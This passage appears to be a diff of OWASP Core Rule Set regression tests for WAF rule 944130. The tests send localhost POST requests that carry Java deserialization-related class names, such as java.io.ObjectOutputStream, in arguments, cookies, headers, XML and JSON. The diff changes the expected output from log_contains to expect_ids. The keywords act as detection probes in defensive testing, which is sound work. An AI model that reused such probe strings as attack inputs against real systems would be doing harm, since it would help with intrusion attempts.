version: "HTTP/1.0" - data: "{\"java.io.InputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 155 desc: "Argument test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 156 desc: "Argument name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log: + expect_ids: [944130] + - test_id: 157 desc: "Cookie test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: 
[944130] + - test_id: 158 desc: "Cookie name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStreamReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 159 desc: "Request header test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 160 desc: "XML attribute value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 161 desc: "XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-162 + 
- input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 162 desc: "Nested XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 163 desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 164 desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStreamReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 165 desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStreamReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 166 desc: "Argument test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-167 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 167 desc: "Argument name includes 
keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log: + expect_ids: [944130] + - test_id: 168 desc: "Cookie test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 169 desc: "Cookie name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.LineNumberReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 170 desc: "Request header test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-171 + - input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 171 desc: "XML attribute value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 172 desc: "XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 173 desc: "Nested XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 174 desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 175 desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.LineNumberReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 176 desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.LineNumberReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 177 desc: "Argument test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log: + expect_ids: 
[944130] + - test_id: 178 desc: "Argument name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 179 desc: "Cookie test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 180 desc: "Cookie name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ObjectOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 181 desc: "Request header test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id 
